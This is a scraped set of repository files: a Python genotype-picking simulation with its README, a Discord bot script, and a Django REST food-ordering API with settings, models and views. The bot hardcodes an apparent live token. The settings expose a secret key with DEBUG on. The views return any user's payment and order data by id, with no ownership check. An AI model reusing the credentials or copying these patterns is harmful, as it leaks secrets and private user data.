np.array(samplesize)\n array = np.zeros((len(sd), len(samplesize), 10))\n x = samplesize\n y = sd\n x_title = \"sample size\"\n y_title = \"σ of growth rate\"\n z = \"SamplesizeSDgrowth\"\n elif np.size(sd) > 1 and np.size(numgenos) > 1 and np.size(samplesize) == 1:\n numgenos = np.array(numgenos)\n samplesize = np.array([samplesize])\n array = np.zeros((len(numgenos), len(sd), 10))\n sd = np.array(sd)\n x = sd\n y = numgenos\n x_title = \"σ of growth rate\"\n y_title = \"number of genotypes\"\n z = \"NumgenosSDgrowth\"\n else:\n raise ValueError('Exactly two variables (numgenos, sd or samplesize) need to be defined by a range of values!')\n if np.size(sd) > 1 and 'sample' in kwargs:\n raise ValueError('The estimation of genotype richness for a specific sample size requires ranges of number of genotypes (numgenos) and samplesizes!')\n\n import numpy as np\n import matplotlib.pyplot as plt\n import random\n import pandas as pd\n import seaborn as sns\n \n if 'sample' in kwargs:\n if kwargs['sample'] not in samplesize:\n raise ValueError('The value of \"sample\" needs to be included in the range of sample sizes!')\n else:\n [[num]] = np.where(samplesize == kwargs['sample'])\n sampleprobs2 = pd.DataFrame(columns = numgenos)\n\n for i in range(0, 10):\n sampleprobs = np.zeros((100, len(numgenos)))\n meanprobs3 = [] # set up final probability matrix\n # set up population matrix\n for a in range(len(numgenos)): \n pops=np.zeros((numgenos[a], 4))\n startamount = []\n \n for j in range(0, numgenos[a]):\n startamount.append(random.randint(mincell, maxcell)) \n pops[:, 0] = startamount\n \n # set up probability matrices for intermediate loops\n meanprobs1 = []\n meanprobs2 = []\n \n # assign growthrates to genotypes, calculate proportion of genotypes after exponential growth\n for b in range(len(sd)):\n pops[:, 1] = np.array(np.random.normal(loc=growthrate, scale=sd[b], size=numgenos[a]))\n pops[:, 2] = pops[:, 0] * np.exp(pops[:, 1] * days)\n pops[:, 3] = pops[:, 2]/sum(pops[:, 2])\n \n # Repeated picking (100 times) of clones with different sample sizes\n stats = []\n picks = [None] * len(samplesize)\n uniqpicks = [None] * len(samplesize)\n prop = [None] * len(samplesize)\n for d in range(0, 100):\n for e in range(len(samplesize)):\n picks[e] = random.choices(population=range(0, numgenos[a]), # pick cells\n weights=pops[:, 3],\n k=samplesize[e])\n\n uniqpicks[e] = np.unique(picks[e], return_counts=False) # identify distinct genotypes\n prop[e] = (samplesize[e] - len(uniqpicks[e]))/samplesize[e] # calculate proportion of clones in each sample (sample size) \n stats.append(prop.copy()) # append the proportions from 
each picking step to growing list\n if 'sample' in kwargs:\n sampleprobs[:, a] = [row[num] for row in stats]\n meanprobs1.append(np.mean(stats, axis = 0)) # calculate mean proportion of clones across 100 repeats and append it for each sd to growing list\n if np.size(samplesize) == 1:\n meanprobs2 = np.array(meanprobs1).T.tolist() # transpose\n if np.size(samplesize) > 1:\n meanprobs2 = meanprobs1\n if np.size(numgenos) > 1:\n meanprobs3.append(meanprobs2) # append mean proportions for each population size (numgenos) to growing list\n if np.size(numgenos) == 1:\n meanprobs3 = meanprobs2\n if 'sample' in kwargs:\n sampleprobs1 = pd.DataFrame(sampleprobs, columns = y)\n sampleprobs2 = sampleprobs2.append(sampleprobs1, ignore_index=True)\n # transform into numpy array\n out = pd.DataFrame(np.array(meanprobs3).reshape(len(y), len(x)))\n array[:, :, i] = out # fill 3D array\n print((i+1)*10,'%')\n if 'sample' in kwargs:\n sampleprobs2.to_csv('Probs_for_Sample.csv')\n df = np.mean(array, axis=2) # calculate means of 100 repetions\n df = pd.DataFrame(df, index = y, columns = x)\n df.to_csv(z+'_GenRis.csv')\n \n df_percent = df * 100\n df_percent = df_percent.round()\n df_percent = df_percent.astype(int)\n \n #plot as heatmap\n sns.set(font_scale=0.6)\n fig, ax = plt.subplots()\n ax = sns.heatmap(df_percent, annot=True, fmt=\"d\", linewidth=.2, cbar_kws={'label': 'probability of picking clones (%)'})\n ax.set_yticklabels(ax.get_yticklabels(), rotation=0)\n ax.set(xlabel = x_title, ylabel = y_title)\n fig.savefig(z+\"_Heatmap.pdf\")\n \n \nif __name__ == \"__main__\":\n genris()\n"
},
{
"alpha_fraction": 0.8339805603027344,
"alphanum_fraction": 0.8339805603027344,
"avg_line_length": 92.63636016845703,
"blob_id": "db40634689f52d08c2cd1fb68393c896c7c84e60",
"content_id": "b019e4f4de9b5cc9e7f016421deb5226795566bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1030,
"license_type": "no_license",
"max_line_length": 732,
"num_lines": 11,
"path": "/README.md",
"repo_name": "ingrid-miriel/PickingClones",
"src_encoding": "UTF-8",
"text": "# GenRis\nLarge genetic diversity and low number of observed identical multi-locus genotypes (MLG) in population genetic studies of aquatic microalgae create challenges when interpreting the proportion of MLGs in natural algal blooms. This computer model was therefore created to simulate the composition of microalgal populations after a defined period of exponential growth. We simulated the probability of picking identical MLGs from this population as a function of initial genotypic diversity, intraspecific differences in growth rates and sample size. The number of distinct genotypes in each population can then be extrapolated from the model outputs and observed proportion of identical MLGs in respective population genetic studies. \n\n\n\n# CurveFitting\nFitting a curve through the mean probabilities of picking identical MLGs in a range of population sizes and a set sample size to estimate genotypic richness based on an observed proportion of identical MLGs.\n\n#\n\nPlease see the included user manual for more information.\n"
}
] | 3 |
smashinfashion/bug-smash-bot | https://github.com/smashinfashion/bug-smash-bot | af96f24567e34807b2b4b142e810469fdff6a1b5 | 87b8258e6b3c362f8f1d4d57e260c9d830abee65 | 44994da7c3dd75933098e3fe4f32bb958ea0ce6e | refs/heads/master | 2017-10-07T14:41:48.636123 | 2017-02-07T18:15:48 | 2017-02-07T18:15:48 | 81,231,103 | 0 | 0 | null | 2017-02-07T16:48:38 | 2017-02-07T16:48:38 | 2017-02-07T16:57:07 | null | [
{
"alpha_fraction": 0.6631578803062439,
"alphanum_fraction": 0.6715789437294006,
"avg_line_length": 20.590909957885742,
"blob_id": "2a5f74bb2cb5eae5e2c5eb635691cc07c0bc7c20",
"content_id": "92279148d91a80f8c03bd93fd5df20bb45c7fde1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 22,
"path": "/malina.py",
"repo_name": "smashinfashion/bug-smash-bot",
"src_encoding": "UTF-8",
"text": "import discord\n\nclient = discord.Client()\n\[email protected]\nasync def on_message(message):\n #ignore the message if the bot is the author\n if message.author == client.user:\n return\n\n if message.content.startswith('!hello')\n await client.send_message(message.channel, 'Hi there! :)')\n\t\n\[email protected]\nasync def on_ready():\n print('Logged in as'\n print(client.user.name)\n print(client.user.id)\n print('------')\n\nclient.run('Mjc4NTg0ODM4Mjg4NTcyNDI2.C3ucBw.fpH5c_5E3FRidqKpXdYKAHUm5pc')\n"
},
{
"alpha_fraction": 0.790123462677002,
"alphanum_fraction": 0.790123462677002,
"avg_line_length": 39,
"blob_id": "f7823f331a740929b9a67ab9b27209c576b65e3d",
"content_id": "f4d489d50326cfea5c2f3a422d16fc23a10fa3a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 2,
"path": "/README.md",
"repo_name": "smashinfashion/bug-smash-bot",
"src_encoding": "UTF-8",
"text": "# bug-smash-bot\nA discord chatbot for reporting Overwatch bugs. Uses discord.py\n\n"
}
] | 2 |
sheymen/Gourmory | https://github.com/sheymen/Gourmory | 0d1c65a9df91890efae4ed4497dd05b213bc9913 | e6ace6c0746f64ae549b28a55da3fb44989e8a4c | 85dfc7336c8d9c3414d3e69825a76a0e94782fb2 | refs/heads/master | 2021-01-25T10:56:13.350149 | 2017-06-11T16:20:28 | 2017-06-11T16:20:28 | 93,894,360 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6869198083877563,
"alphanum_fraction": 0.6928269863128662,
"avg_line_length": 38.5,
"blob_id": "5775f9b8e6b2b60a3be7523f870b867c56a27ba1",
"content_id": "b330f37ffa32792135385ce107bbb28e72156fcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1185,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 30,
"path": "/Gourmery/urls.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom rest_framework import routers\n\n\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'Gourmery.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')), \n\n url(r'^adminCre8215&11/', include(admin.site.urls)),\n url(r'^token_auth/$','rest_framework.authtoken.views.obtain_auth_token'),\n\n #API\n url(r'^hello/','API.views.hello_world',name='hello'),\n url(r'^api/getUserInfo','API.views.getUserInfo',name='getUserInfo'),\n url(r'^api/getUserPayment','API.views.getUserPayment',name='getUserPayment'),\n url(r'^api/getUserGustos','API.views.getUserGustos',name='getUserGustos'),\n url(r'^api/getUserCustomers','API.views.getUserCustomers',name='getUserCustomers'),\n url(r'^api/getUserCurrentOrder','API.views.getUserCurrentOrder',name='getUserCurrentOrder'),\n url(r'^api/getUserOrders','API.views.getUserOrders',name='getUserOrders'),\n url(r'^api/getSucursales','API.views.getSucursales',name='getSucursales'),\n\n]\n"
},
{
"alpha_fraction": 0.5188679099082947,
"alphanum_fraction": 0.7075471878051758,
"avg_line_length": 17.705883026123047,
"blob_id": "78e3dd8571361a7b94142e2509b141654f8d28b3",
"content_id": "d8b4f2157924c3398499dfcbfddf84cbc858c6b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 17,
"path": "/requirements.txt",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "amqp==1.4.9\nanyjson==0.3.3\nbilliard==3.3.0.23\ncelery==3.1.18\nDjango==1.8\ndjango-celery==3.1.16\ndjango-cors-middleware==1.2.0\ndjango-filter==0.13.0\ndjango-kombu==0.9.4\ndjango-redis-cache==0.13.1\ndjangorestframework==3.3.3\nkombu==3.0.35\nMarkdown==2.6.6\nPillow==3.2.0\npytz==2016.4\nredis==2.10.5\nredis-simple-cache==0.0.8\n"
},
{
"alpha_fraction": 0.6627534627914429,
"alphanum_fraction": 0.6706510186195374,
"avg_line_length": 24.87845230102539,
"blob_id": "641bec799abbcf4b0d062ec5383b553c1a64d18b",
"content_id": "b13705d5a494269853efcda5ea25ccbcf6a3210d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4685,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 181,
"path": "/Gourmery/settings.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDjango settings for Gourmery project.\n\nGenerated by 'django-admin startproject' using Django 1.8.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.8/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'yrn#i&lmfskc0k57$ew0cnfntl7+_1&5(b4sh&6zw#@)_s$_&='\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = ['*']\n\nfrom unipath import Path\nRUTA_PROYECTO = Path(__file__).ancestor(2)\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # AQUI SE MUESTRAN LAS APLICACIONES DE TERCEROS\n 'djcelery',\n 'djkombu', \n 'rest_framework',\n 'rest_framework.authtoken',\n 'corsheaders',\n\n 'API'\n \n \n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\nROOT_URLCONF = 'Gourmery.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'Gourmery.wsgi.application'\n\n# Manejo de sesiones en cache, para no saturar la base de datos\nSESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'mydatabase',\n #Produccion\n # 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n # 'NAME': '*',\n # 'USER': '*',\n # 'PASSWORD' : '*',\n # 'HOST' : 'localhost',\n # 'PORT' : '', \n }\n}\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'es-mx'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n\n\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = RUTA_PROYECTO.child('media')\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nSTATIC_ROOT = '/opt/Gourmery/v0.1/static/'\n\nSTATIC_URL = '/static/'\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES':(\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n ),\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n ),\n 'DEFAULT_FILTER_BACKENDS': (\n 'rest_framework.filters.DjangoFilterBackend',\n 
),\n\n}\n\n# Base de datos Redis\nCACHES = {\n 'default':{\n 'BACKEND':'redis_cache.RedisCache',\n 'LOCATION':'localhost:6379',\n 'OPTION':{\n 'DB':1,\n 'PARSER_CLASS':'redis.connection.HiredisParser'\n }\n } \n}\n\n# Permite trabajar de manera asincrona con redis\n\nimport djcelery\ndjcelery.setup_loader()\n\nBROKER_URL = 'redis://localhost:6379/0' \n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'social.apps.django_app.context_processors.backends',\n 'social.apps.django_app.context_processors.login_redirect',\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.request\",\n \"django.core.context_processors.csrf\",\n)\n\n"
},
{
"alpha_fraction": 0.6956138610839844,
"alphanum_fraction": 0.7047736644744873,
"avg_line_length": 32.38823699951172,
"blob_id": "c1279a8ef1e44d6cc50ef93bac798d88c29a0dba",
"content_id": "0eb2fc7400280ae11aeb07e9013619f027df4fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5677,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 170,
"path": "/API/models.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db import models\n\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\n\nclass User_info(models.Model): \n user = models.OneToOneField(User) \n name = models.CharField(max_length=255)\n userName = models.CharField(max_length=255)\n email = models.CharField(max_length=255)\n phone = models.CharField(max_length=255)\n profile_picture = models.ImageField(upload_to='profile_User')\n last_connection = models.DateTimeField()\n reputacion = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.user)\n \nclass Menu(models.Model): \n id_menu = models.AutoField(primary_key=True)\n id_sucursal = models.ForeignKey('Sucursal', related_name='sucursal_menu')\n descripcion = models.CharField(max_length=255)\n tipo_comida = models.CharField(max_length=255)\n precio = models.IntegerField()\n photo_menu = models.ImageField(upload_to='photo_menu')\n\n def __unicode__(self):\n return unicode(self.id_menu)\n\n \nclass Pedido(models.Model): \n id_pedido = models.AutoField(primary_key=True)\n id_userInfo = models.ForeignKey('User_info', related_name='user_infoPedido')\n id_direccion = models.ForeignKey('Direccion', related_name='direccion_pedido')\n Precio_total = models.IntegerField()\n Date = models.DateTimeField()\n hour = models.DateTimeField()\n id_statusOrden = models.ForeignKey('Status_orden', related_name='status_ordenPedido')\n\n def __unicode__(self):\n return unicode(self.id_pedido)\n\n \nclass Vendedor(models.Model): \n id_vendedor = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoVendedor')\n status = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_vendedor)\n\n \nclass Direccion(models.Model): \n id_direccion = models.AutoField(primary_key=True)\n direccion = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_direccion)\n\n \nclass Listapedido(models.Model): \n id_listapedido = models.AutoField(primary_key=True)\n id_menu = models.ForeignKey('Menu', related_name='menuListaPedido')\n id_pedido = models.ForeignKey('Pedido', related_name='menuPedido')\n cantidad = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_listapedido)\n\n \nclass Sucursal(models.Model): \n id_sucursal = models.AutoField(primary_key=True)\n name = models.CharField(max_length=255)\n phone = models.CharField(max_length=255)\n addres = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_sucursal)\n\n \nclass Status_orden(models.Model): \n id_statusOrden = models.AutoField(primary_key=True)\n descripcion = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_statusOrden)\n\n \nclass Lista_direcciones_ip(models.Model): \n id_lista_direcciones_ip = models.AutoField(primary_key=True)\n id_ip_records = models.ForeignKey('Ip_records', related_name='ip_recordsLista_direcciones_ip')\n direccion_ip = models.CharField(max_length=255)\n fecha_usro = models.DateTimeField()\n\n def __unicode__(self):\n return unicode(self.id_lista_direcciones_ip)\n\n \nclass Payment_user_info(models.Model): \n id_payment_user_info = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoPayment')\n current_payment = models.CharField(max_length=255)\n saldo = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_payment_user_info)\n\n \nclass Gustos(models.Model): \n id_gustos = 
models.AutoField(primary_key=True)\n descripcion = models.CharField(max_length=255)\n categoria = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_gustos)\n\n \nclass Ip_records(models.Model): \n id_ip_records = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoIp_records')\n ip_actual = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_ip_records)\n\n \nclass Lista_gustos(models.Model): \n id_lista_gustos = models.AutoField(primary_key=True)\n id_userInfo = models.ForeignKey('User_info', related_name='user_infoLista_gustos')\n id_gustos = models.ForeignKey('Gustos', related_name='gustos_lista')\n\n def __unicode__(self):\n return unicode(self.id_lista_gustos)\n\n \nclass Payment_Available(models.Model): \n id_payment_Available = models.AutoField(primary_key=True)\n id_payment_userinfo = models.ForeignKey('Payment_user_info', related_name='payment_user_info_available')\n type = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_payment_Available)\n\n \nclass Vendedor_favorito(models.Model): \n id_vendedor_favorito = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoVendedor_favorito')\n fecha_agregado = models.DateTimeField()\n id_vendedor = models.ForeignKey('Vendedor', related_name='vendedor_favorito')\n calificacion = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_vendedor_favorito)\n\n\n# Senal es un elemento que se dispara en django cuando ocurre un cambio, el cual permite liberar el cache para reflejar los cambios\n\nfrom django.core.cache import cache\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom django.contrib.sessions.models import Session\n\n@receiver(post_save)\ndef clear_cache(sender, **kwargs):\n if sender != Session:\n cache.clear()\n\n"
},
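The models above wire the ordering schema together through explicit ForeignKey fields. A short sketch of traversing those relations from a Django shell follows; it is illustrative only — the `API.models` import path is inferred from the `/API/` paths elsewhere in this repo, and the row queried is hypothetical.

```python
# Python 2 sketch (matching the codebase); 'API.models' and the row with
# id_sucursal=1 are assumptions, not part of the repo shown here.
from API.models import Sucursal, Menu

sucursal = Sucursal.objects.get(id_sucursal=1)
for menu in Menu.objects.filter(id_sucursal=sucursal):
    print menu.descripcion, menu.precio
```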
{
"alpha_fraction": 0.6874780058860779,
"alphanum_fraction": 0.6892383694648743,
"avg_line_length": 21.44590950012207,
"blob_id": "9ecb144e5f21688c430d5e10c8b07c04e858ad3b",
"content_id": "35fbef29e175ccd70661f60d46beb69b451909e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8521,
"license_type": "no_license",
"max_line_length": 277,
"num_lines": 379,
"path": "/API/views.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom models import * \nfrom rest_framework import viewsets\nfrom rest_framework import status \nfrom rest_framework.decorators import api_view \nfrom rest_framework.response import Response \nfrom rest_framework.permissions import AllowAny\n\nfrom rest_framework import generics, filters\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.core import serializers\nimport json\n\n\n\n# Create your views here.\n\n\n@api_view()\ndef hello_world(request):\n return Response({\"message\": \"Hello, world!\"})\n\n\n@api_view()\ndef getUserInfo(request):\n\tprint 'Profile user Api'\n\n\tid_user = (request.GET['id_user'])\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\ttry:\n\t\t\tdata = []\n\t\t\tdata.append({'user': str(profile.user),'email': profile.email,'username': profile.userName,'real_name': profile.name,'phone': profile.phone,'profile_picture': str(profile.profile_picture),'reputacion':str(profile.reputacion),'last_connection':str(profile.last_connection),})\n\n\t\t\n\t\texcept Exception, e:\n\t\t\tprint e\n\n\n\t\tprint data\n\t\ttry:\n\t\t\treturn Response(json.dumps(data))\n\t\texcept Exception, e:\n\t\t\tprint e\n\t\t\n\telse:\n\t\treturn Response({\"message\": \"User no\"})\n\n\n\n\n@api_view()\ndef getUserPayment(request):\n\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\ttry:\n\t\t\tpayment_user_info = Payment_user_info.objects.get(Q(id_user_info = profile))\n\t\texcept Exception, e:\n\t\t\tprint e\n\t\t\tpayment_user_info = \"\"\n\t\t\n\t\tif payment_user_info:\n\t\t\tprint payment_user_info\n\t\t\ttry:\n\t\t\t\tdata = []\n\t\t\t\tdata.append({'current_payment':str(payment_user_info.current_payment),'saldo':str(payment_user_info.saldo),})\n\n\t\t\texcept Exception, e:\n\t\t\t\traise e\n\n\t\t\tprint data\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(data))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\treturn Response({\"message\": \"no payment user\"})\n\n\telse:\n\t\treturn Response({\"message\": \"User no\"})\n\n\n\n@api_view()\ndef getUserGustos(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\tlista_gustos = Lista_gustos.objects.filter(Q(id_userInfo=profile))\n\n\t\tgustos=[]\n\n\t\tfor gusto in lista_gustos:\n\t\t\tgustos.append({'categoria':str(gusto.id_gustos.categoria),'descripcion':str(gusto.id_gustos.descripcion),})\n\n\t\tprint gustos\n\t\ttry:\n\t\t\treturn Response(json.dumps(gustos))\n\t\texcept Exception, e:\n\t\t\tprint e\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getUserCustomers(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\tvendedor_favorito = 
Vendedor_favorito.objects.filter(Q(id_user_info=profile))\n\n\t\tvendedores=[]\n\n\t\tfor vendedor in vendedor_favorito:\n\t\t\tvendedores.append({'calificacion':str(vendedor.calificacion),'fecha_agregado':str(vendedor.fecha_agregado),'id_vendedor':str(vendedor.id_vendedor),})\n\n\t\tprint vendedores\n\t\ttry:\n\t\t\treturn Response(json.dumps(vendedores))\n\t\texcept Exception, e:\n\t\t\tprint e\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getUserCurrentOrder(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\t# guard the lookup so a user without an order gets a clean message instead of an uncaught DoesNotExist\n\t\ttry:\n\t\t\tpedido = Pedido.objects.get(Q(id_userInfo=id_user))\n\t\texcept Exception, e:\n\t\t\tprint e\n\t\t\tpedido = \"\"\n\t\tlista_pedidos=[]\n\n\t\tif pedido:\n\t\t\tlista = Listapedido.objects.filter(Q(id_pedido=pedido))\n\t\t\t# initialized in case the order has no line items\n\t\t\tsucursal_id = \"\"\n\t\t\tdate = pedido.Date\n\t\t\thour = pedido.hour\n\t\t\tprecio_total = pedido.Precio_total\n\t\t\tstatus_orden = pedido.id_statusOrden.descripcion\n\t\t\tdireccion_entrega = pedido.id_direccion.direccion\n\t\t\tdireccion_entrega = direccion_entrega.encode('utf8')\n\t\t\tprint direccion_entrega\n\n\n\t\t\tpedidos = []\n\t\t\tfor pedido1 in lista:\n\t\t\t\tsucursal_id = pedido1.id_menu.id_sucursal\n\t\t\t\tpedidos.append({'cantidad':str(pedido1.cantidad),'descripcion':str(pedido1.id_menu.descripcion),'tipo_comida':str(pedido1.id_menu.tipo_comida),'photo_menu':str(pedido1.id_menu.photo_menu),})\n\n\n\t\t\tlista_pedidos.append({'date':str(date),'hour':str(hour),'precio_total':str(precio_total),'status_orden':str(status_orden),'pedidos':pedidos,'sucursal_id':str(sucursal_id),'direccion_entrega':str(direccion_entrega),})\n\n\t\t\tprint lista_pedidos\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(lista_pedidos))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\tprint('no data in pedido')\n\t\t\treturn Response({\"message\": \"no data in pedido\"})\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\t\t\n\n\n\n@api_view()\ndef getUserOrders(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\t# guard the lookup so a user without an order gets a clean message instead of an uncaught DoesNotExist\n\t\ttry:\n\t\t\tpedido = Pedido.objects.get(Q(id_userInfo=id_user))\n\t\texcept Exception, e:\n\t\t\tprint e\n\t\t\tpedido = \"\"\n\t\tlista_pedidos=[]\n\n\t\tif pedido:\n\t\t\tlista = Listapedido.objects.filter(Q(id_pedido=pedido))\n\t\t\t# initialized in case the order has no line items\n\t\t\tsucursal_id = \"\"\n\t\t\tdate = pedido.Date\n\t\t\thour = pedido.hour\n\t\t\tprecio_total = pedido.Precio_total\n\t\t\tstatus_orden = pedido.id_statusOrden.descripcion\n\t\t\tdireccion_entrega = pedido.id_direccion.direccion\n\t\t\tdireccion_entrega = direccion_entrega.encode('utf8')\n\t\t\tprint direccion_entrega\n\n\n\t\t\tpedidos = []\n\t\t\tfor pedido1 in lista:\n\t\t\t\tsucursal_id = 